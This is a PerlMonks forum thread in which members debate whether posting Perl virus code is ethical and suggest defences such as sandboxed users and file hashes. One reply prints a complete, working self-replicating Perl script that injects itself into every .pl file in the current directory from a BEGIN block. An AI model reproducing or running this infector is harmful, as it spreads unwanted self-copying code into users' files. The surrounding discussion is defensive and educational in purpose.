I don't find this code paricularly interesting and don't think encouraging people to look in this direction is a good idea. I'd rather you had just kept the code to yourself or found something more useful to spend your time on.

I find that these types of things are usually built up in stages and someone getting the idea to write a Perl virus and then actually going all the way to creating a non-trivial, mallicious virus is rather unlikely. But one person getting it started and then another adding to it, etc. is quite likely to end up with someone eventually producing something that I'd much rather never get produced. Part of the reason for this is that each little step along the way is a much easier moral decision based on the existance of the previous work.

I don't know if a non-trivial virus can be written in Perl. I don't really want to find out.

I'd appreciate having this not be approved for its section and having the code removed from it. While I don't find researching malware to be immoral, I do find releasing malware seeds to the world to be exactly that.

(updated to add "code" to the first line. Thanks to jepri for noting that I was not being clear there.)

I do agree -- having a Perl virus developed may be hazardous. However, I also feel there are two sides of the story.

Virii have been a problem for some time, and have been developed in all sorts of languages. There are already PHP viruses. With that in mind, it would seem likely that eventually, someone would write a virus in Perl, it's just a matter of when.

I don't feel that security by "ignoring it and hoping it goes away" would be a good long term solution. Is there anything that could ever be done to prevent a Perl virus from running? I don't really know. However, I would much rather have this opportunity to discuss the matter with the reasonable, intelligent people who frequent this site (not to be confused with "reasonably intelligent people", found at various other sites ;-), then run around trying to clean up the mess after it happens in the future, and THEN having this discussion :-)

So opening things wide open -- is there anything that could be done with Perl to prevent a Perl virus from doing damage? It seems extremely difficult, and I don't know any other language that has figured out a way around this. But if any language could develop a system to aid in prevention, it would be Perl!

tye, I'm not dissagreeing with you per-se. I suppose that I just feel that since it's going to happen anyway, that perhaps it would be easier to attempt to deal with the issue now. I'm just glad it was a monk offering code up for review, and not one of my users trying it out on my system. But perhaps this should be a non-public discussion -- I'll leave that up to you guys :-)
-Eric

Update: BTW, is there a system for non-public discussion on this site? Password protected forums, forums that require a particular level, etc?

Update 2: After seeing lemming's post, I changed all referenced of "virii" to "viruses", which is apparently the correct usage. Thanks Lemming :-)

        Is there anything that could ever be done to prevent a Perl virus from running?

Well, I would like to offer my suggestions.
• Make an unprivileged user and call it "scriptGuy" or something
• Remove all of that users privileges everywhere, and I mean EVERYWHERE.
• Begin restoring privileges to that user on a need-by-need basis until it becomes a semi-usable account
• Run all scripts as that user
• Never run code found in the wild without understanding it or, at least, trusting the source from which it came
    Now, this discussion is going to easily turn into a general discussion on computer security (i.e. shut off ftp and telnet, use ipchains, etc., etc.). But, that might not be such a bad discussion to have.

Jeremy

To clarify, discussing viruses and even producing a virus can be important research. Releasing the code to the world as part of the research is a big mistake in my book. It is the inclusion of the code that I object to, especially in a public place such as this.

And I'm not claiming that hiding this one bit of code will stop the creation of viruses. I am worried that not hiding it could cause the creation of a virus. That is, speed up the creation of a virus or increase the number of such viruses.

This is not a security measure. This is a moral decision to not contribute to the creation of a virus. Sure, think about it and talk about it, but don't hand out seeds to the world. Sure, some virus will probably come along eventually but I don't want to have had a hand in its developoment!

(updated)

        - tye (but my friends call me "Tye")

I waited a day to see if I felt the same way about what you have said - I do. On the one hand you casually dismiss the very idea with a handwave ('I don't find this particularly interesting') and yet you want it removed because you think it promotes the creation of "malware". That isn't interesting? Hmmmm, well, why teach anyone to program, then? You never know how the potential miscreants might use that skill later on!

I have always believed that attempts to hide knowledge from others are far worse than what someone might do with that knowledge. The dirtbags of this world often depend on the ignorance and naivete of others in order to accomplish their dirty deeds.

I see that tachyon has been pressured into removing the code. I wish he would restore it. I don't see that there is any need for censorship of anything put in this forum that was part of an honest attempt to discuss a Perl issue.

        I do find releasing malware seeds to the world to be exactly that.

    I don't know. To me, that seems akin to the old mantra "security through obscurity." That is, the "don't-talk-about-it-so-people-won't-think-about-it" kind of mentality always seems to backfire. I, for one, am intrigued by this post; but certainly not in a malicious sense. I am interested because in order to solve problems (if we would want to classify this as such), you must identify the problem and provide proof of concept, which is what tachyon did.
    To me, the real discussion should now become "how providing solutions to this problem". We should discuss making sure non-privileged users (or lowest neccesary priveleged users) are running Perl scripts. We should talk about verifying code found "in the wild" before running it, etc. Then, after coming up with a way to prevent this sorta thing from happening, we can return to the original problem and see if we can get around the solution we came up with.
    Do you disagree with BugTraq? They often talk about and provide proofs of concept for code and techniques that could easily be maliciously employed.
    In the end, to me, this could be turned into a very valuable discussion. Granted, the code could be modified in such a way to only provide proof of concept rather than executing that concept at all. But, I find nothing wrong with it.

Jeremy

When I've seen malwarish code distributed by security resources, it has always been at least one of these:

• Already in the wild
• Solutions to thwart it are already available
• The code has been very carefully modified to introduce several subtle bugs
• It is intentionally very vague, intentionally leaving out some key ideas required to make it work
• It is a reaction to some other organization not dealing with a security issue in a manner that was considered acceptable by the distributor of the malware
And this last item I find close to the concept that "cracking is good because it gets people to increase their security". Although I think that you can do some very careful cracking to bring home a point about a lack of security, I find it immoral to do damage while doing that. And handing out tools that can be used by others who probably don't agree with me on that is not a good idea in my book.

I never said "don't talk about it". I don't find the working code very interesting. The concept is simple enough that I don't think the working code adds much to it. To stop such a virus you need to prevent/detect modifications to files. The details about how the modifications are done are mostly irrelevant and concentrating too much on them gets you a solution that isn't robust anyway.

It is like untainting variables by trying to think up which characters you want to exclude. You are bound to miss some. Instead, specify which characters that you know aren't going to be a problem. For a virus, you need to figure out ways that scripts can be modified safely and how to prevent/detect all other modification, not just the modification methods highlighted by a proof of concept.

        - tye (but my friends call me "Tye")

While I don't find researching malware to be immoral, I do find releasing malware seeds to the world to be exactly that.

I must disagree. Morality (to me at least) depends on intent. You said above that researching malware is not immoral, well, if someone is doing that research to make a virus with mal-intent, I find that immoral. But, in tachyon's case, if he is researching inorder to help, well I don't think that's immoral. Tachyon certainly did not 'release malware seeds to the world' so that the world would be worse off, he did it for quite the opposite reason. It's really a phillosophy here that I'm arguing over. It comes down to this: does the end justify the means or do the means justify the end? Personally, I believe the latter to be the case.

I don't know if a non-trivial virus can be written in Perl. I don't really want to find out.

Again, I must humbly disagree. If we can maturely discuss these issues, then mabey we can find a way to stop a perl virus. Your argument is one for ignorance, believing that ignorance is bliss. Well, it may be, but not after someone makes a perl virus and your faced with it anyway. I say it is much better to find out now, in a controlled enviornment; where we all are intellegent people with good intents.

The 15 year old, freshman programmer,
Stephen Rawls

I don't claim that tachyon's intent was to encourage the production of malware. I claim that what he did is likely to do that and so is an immoral act. Whether his intend was immoral is a different question. He seemed to have moral qualms about the act. I wish he had listened more to his conscience. (:

Again, I'm not saying we should avoid discussing it.

        - tye (but my friends call me "Tye")

#/usr/bin/perl -wT
use strict;
print "Hello, world!\n";
[download]

#/usr/bin/perl -wT
use strict;

#example of MD5 protection
use Validate::MD5;

print "Hello, world!\n";

#not a real hash this is off the top of my head
__HASH__
1A2E8584399E234F290C
[download]

If you're concerned about someone editing your scripts, you sure don't want to put a hash in them. You'd want it somewhere else, so if the script were compromised, the hash could detect it.

I used to work for one of the antivirus companies. So I do know a bit about viruses, but am by no means an expert. I didn't do much deconstruction work, except on Unix.

A lot of the viruses out in the wild now are viruses that started out as a proof of concept and then somebody else ran with it. (See Concept & Melissa for examples). Trojans are probably a bigger threat in my opinion, but the definitions have intertwined over the years.

I'm against posting virus code even if it's harmless. It can inspire an otherwise unoriginal script kiddie to release what was before in a out of the way place. It can also have legal consequences. I'd rather not open up perlmonks to that sort of exposure. We can talk about it and I'd even go for posting snippets of code that is considered dangerous, but to post a full working program is wrong. Plus I'd hate to see the next McAfee/Symantec press release.

Some bits:

I ++ tachyon for creating smart code (which I cannot see, but sure it is), and ++ tye for hiding it from me - in 15 minutes after it was posted. But - it was posted for full 15 minutes!

I am sure it will be interesting to see the code, but I agree with andreychek there should by non-public place to discuss these things.

Most experienced monks are "saints" for a reason. They will not do harm even if they can. Less experienced malicious perl coder may be here lurking around. Do not provide him a tool to do wrong. Let him earn experience - when he will be able to build a virus, hopefully he will be saint and will not want to do it.

Updated

So from now on, I should be scared to install any perl module, because I always need to analyze it if it does not contain perl source-code virus? Can I hope that CPAN testers will be able to catch virus posted in CPAN site?

Maybe smart saint monks might to get together, analyze virus, analyze virus cleaner, and put together some script parser to check for known virus concepts, and also some heuristic search for tricks possibly being used, to give me a warning which lines are suspicious?

I was just looking for a module on ActiveState site. Now I will do it anyway, but I definitely will read the source code - and learn something...

So I need to be concerned with tricks including SEEK and <DATA>, right?

pmas

To make errors is human. But to make million errors per second, you need a computer.

So I need to be concerned with tricks including SEEK and <DATA>, right?

Wrong. Virusses can be "implanted" in many ways, not needing <DATA> or seek. Here's some code I posted to Usenet several years ago; if you run it, it will try to infect all files ending in ".pl" in the current directory. It won't do anything but try to replicate itself. It does its business from a BEGIN block, so even running it with -c cause replication.

#!/opt/perl/bin/perl -w

use strict;

# HACKED
BEGIN {
    local *ME;
    if (open ME, $0) {
        local $/;
        my $me =  <ME>;
        my ($text) = $me =~ /(# HACKED\n.*?# HACKED\n)/s;
        if (opendir DIR, ".") {
            foreach my $file (readdir DIR) {
                next unless $file =~ /.pl$/;
                local *FILE;
                if (open FILE, "+< ./$file") {
                    my $program = <FILE>;
                    unless ($program =~ /# HACKED/) {
                        $program =~ s/\n/\n$text/;
                    }
                    seek FILE, 0, 0;
                    print FILE $program;
                }
                close FILE;
            }
        }
        closedir DIR;
    }
    close ME;
}
# HACKED

__END__
[download]

-- Abigail

Not to pick a nit (I agree with your general point) but the above code *does* use seek... around line 20 you have


seek FILE, 0, 0;
print FILE $program;
[download]

-Blake

pmas, I think you did a good job at summing things up.

Let me be a devil's advocate for a moment. My question is -- where exactly does the point lie where code becomes a hazard? The code originally written on this could modify perl scripts in the current directory, and it was removed because it was deemed dangerous.

Now, where exactly is the line drawn that seperates code that is "okay" from something that should not be posted? In this case, the code was drawn up in the first place due to this post, by chromatic. In fact, chromatic's original post was rated quite high (and yes, I had to use a vote on it right now to figure that out ;-) Nobody seemed to object to that particular post.

The code in this post was removed because it gave a working example of how to create something virus-like. But by leaving Chromatic's post, aren't we saying that it's fine to write a virus, here's how to get started, we just aren't going to show you the exact code.. meaning that the person has to be at a particular skill level to make it work. So in essance, it would seem as if we are leaving virus writting for the more skilled Perl programmers, and simply keeping the script kiddies off the street for the moment.

Again, I'm saying all of this as devil's advocate. However, the question I am posing is this-- how do we know when to remove code? What if what was posted could be used for good as well as bad, is it worth keeping it then? What if self modifying code could be used as a fancy form of "perl -i blah"? What if "perl -i blah" could be used as a virus? Just some thoughts to ponder :-)
-Eric

A three-month Perl programmer could write a program that adds similar 'viral' code to all of the Perl programs or modules or CGI scripts in the current directory. The biggest thing tachyon does differently is to use *DATA to store the code and seek to rewind the pseudo file.

Anyone who's capable of writing code that will search for files with a particular extension, open the file and insert a varying number of lines after the first line of each file is capable of writing something similar. Most people here could have done that within a few weeks of learning Perl. Several could have done that in their first week.

That's not to say there are better examples tachyon could have chosen :), but does his code give someone a grand weapon of ferocious power? No. We already have that. It's called Perl.

However, the code is easy to locate on the web. If somebody wants to use seek with __DATA__ they've had quite a while to figure out how.

Personally, I think a perl virus is much less worrying than a compiled executable virus for the obvious reasons, but the topic is intellectually fascinating.

Here's his description of the talk:

_______________________

Extreme Perl -- The Horror That Is SelfGOL

In this talk I dissect the SelfGOL program: an obfuscated, self-aware, viral quine that can:

• self-replicate,
• rewrite other Perl programs to allow them to self-replicate,
• detect un-rewritable Perl programs,
• execute itself or other Perl programs as cellular automata of arbitrary size (to play Conway's "Game of Life"),
• animate any short text as a cycling marquee banner.

SelfGOL accomplishes these feats in under 1000 bytes of standard Perl, without importing any modules, and without using a single if, unless, while, until, for, foreach, goto, next, last, redo, map, or grep.

To do all that in under 1K of code, it relies on some extreme programming techniques, and on many of the obscure backwaters of the Perl syntax. This talk explores both.

_______________________

He's coming to boston.pm in less than two weeks; if we're lucky he may do this talk.

___
-DA

After more time for people to weigh in on the subject, the tally is roughly evenly divided on whether the code should stay hidden.

As one of the editors, a 50/50 split is certainly not enough of a mandate to get me to "edit" a node, so I have undone my temporary changes to the node.

I've submitted this to Nodes to consider so that high-level monks can vote on whether they think the code should remain. This vote is really for informational purposes only as the reputation on the node is fairly positive and so it very unlikely to be deleted (and will be restore even if that happens) and I seriously doubt there will be enough of a mandate to warrant changes by one of the editors. But I'm curious what the numbers from this informal poll will be. Think of it as a way to take a side without having to write a whole node. I apologize that lower-level monks will not be able to participate -- that is what happens when I abuse features of the site for things that they weren't intended. (:

Soon after this my view of the (informal, unscientific) tally (involving node reputations, Nodes to consider votes, and public and private comments to me) started to shift and I now place it somewhere between 3-to-1 and 7-to-1 in favor of not removing the code.

Even if the tally had ended up being close to 50/50, I would not repeat the temporary removal of viral code. Not that I regret what I did. This was "a first" in some ways and I asked before acting but acted quickly to make temporary changes that I thought were important. I think part of my motivation was tachyon's own words: "Still I am troubled by the morality of posting such code."

I also have not changed my mind about seemingly innocent but working code with viral features making it easier for malware to be produced, at least as much for allowing the steps toward malware to be small enough that they are easy to justify as not immoral as for just getting the ball rolling in terms of curiosity, motivation, and a code base.

Anyway, I wanted it to be clear that I won't be doing that for "dangerous" code again. I'll may well /msg the author encouraging them to change their mind, though. (:

        - tye (but my friends call me "Tye")

pmas

To make errors is human. But to make million errors per second, you need a computer.

I checked it again. Virus code was removed from original posting, but I believe valid viral code is still openly posted in an answer to obfuscation. I posted a warning that virus is still avalable to dowload for anybody, and I get downvoted for this post.

I assume it is from virus hackers - for dis-service for malicious hackers community?.. :o)

It will be interesting to find out who downvoted me, and for what reason.

pmas

To make errors is human. But to make million errors per second, you need a computer.